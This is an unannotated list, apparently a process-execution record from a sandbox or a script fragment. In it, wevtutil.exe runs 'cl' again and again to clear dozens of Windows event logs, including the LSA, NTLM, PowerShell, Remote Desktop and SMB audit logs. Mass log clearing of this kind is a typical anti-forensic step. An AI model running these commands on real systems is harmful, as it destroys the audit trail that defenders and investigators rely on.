C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-KeyboardFilter/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Known Folders API Service"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-L2NA/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LDAP-Client/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LSA/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LSA/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LSA/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LUA-ConsentUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LanguagePackSetup/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LanguagePackSetup/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LanguagePackSetup/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LimitsManagement/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LiveId/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LiveId/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MPS-CLNT/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MPS-DRV/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MPS-SRV/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MSFTEDIT/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MSPaint/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MSPaint/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MSPaint/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Media-Streaming/DMC

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Media-Streaming/DMR

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Media-Streaming/MDE

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-MFReadWrite/Transform

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-Performance/SARStreamResource

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-PlayAPI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MemoryDiagnostics-Results/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Minstore/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Minstore/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MobilityCenter/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Autopilot

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Mprddm/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NCSI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NCSI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDF-HelperClassDiscovery/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDIS-PacketCapture/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDIS/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDIS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NTLM/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NWiFi/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Narrator/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Ncasvc/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NcdAutoSetup/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NcdAutoSetup/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NdisImPlatform/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Ndu/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetShell/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Network-Connection-Broker

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Network-DataUsage/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Network-Setup/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Network-and-Sharing-Center/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkBridge/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkLocationWizard/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProfile/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProfile/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProvider/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProvisioning/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProvisioning/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkSecurity/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkStatus/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Networking-Correlation/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Networking-RealTimeCommunication/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NlaSvc/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NlaSvc/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Ntfs/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Ntfs/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Ntfs/WHC

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OLE/Clipboard-Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OLEACC/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OLEACC/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OOBE-FirstLogonAnim/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OOBE-Machine-Core/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OOBE-Machine-DUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OOBE-Machine-DUI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OOBE-Machine-Plugins-Wireless/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OcpUpdateAgent/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/SyncLog

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OneBackup/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OneX/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OneX/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OobeLdr/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OtpCredentialProvider/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PCI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PackageStateRoaming/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PackageStateRoaming/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PackageStateRoaming/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ParentalControls/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Partition/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Partition/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PerceptionRuntime/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PerceptionSensorDataService/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-Nvdimm/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-Nvdimm/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-Nvdimm/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-PmemDisk/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-PmemDisk/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-PmemDisk/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-ScmBus/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-ScmBus/Certification

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-ScmBus/Diagnose

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-ScmBus/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PhotoAcq/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PlayToManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Policy/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Policy/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PortableDeviceStatusProvider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PortableDeviceSyncProvider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Power-Meter-Polling/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerCfg/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerCpl/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrimaryNetworkIcon/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintBRM/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService-USBMon/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Privacy-Auditing/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ProcessStateManager/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Program-Compatibility-Assistant/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Provisioning-Diagnostics-Provider/AutoPilot

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Provisioning-Diagnostics-Provider/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Provisioning-Diagnostics-Provider/ManagementService

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Proximity-Common/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Proximity-Common/Informational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Proximity-Common/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PushNotification-Developer/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PushNotification-InProc/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PushNotification-Platform/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PushNotification-Platform/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PushNotification-Platform/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-QoS-Pacer/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-QoS-qWAVE/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RPC-Proxy/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RPC/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RPC/EEInfo

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RRAS/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RRAS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RadioManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RasAgileVpn/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RasAgileVpn/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReFS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoost/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoost/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoostDriver/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoostDriver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Regsvr32/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteAssistance/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteAssistance/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteAssistance/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-Kernel-Mode-Transport/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-User-Mode-Transport/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Remotefs-Rdbss/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Remotefs-Rdbss/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ResetEng-Trace/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Resource-Exhaustion-Detector/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Resource-Exhaustion-Resolver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ResourcePublication/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RestartManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RetailDemo/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RetailDemo/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Runtime-Graphics/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Runtime-Networking/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Runtime-Web-Http/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Runtime-WebAPI/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Runtime-Windows-Media/WinRTAdaptiveMediaSource

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Runtime-Windows-Media/WinRTCaptureEngine

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Runtime-Windows-Media/WinRTMediaStreamSource

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Runtime-Windows-Media/WinRTTranscode

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Runtime/CreateInstance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Runtime/Error

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBClient/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBClient/HelperClassDiagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBClient/ObjectStateDiagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBClient/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBDirect/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBDirect/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBDirect/Netmon

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBServer/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBServer/Audit

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBServer/Connectivity

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBServer/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBServer/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBServer/Performance

C:\Windows\system32\wevtutil.exe

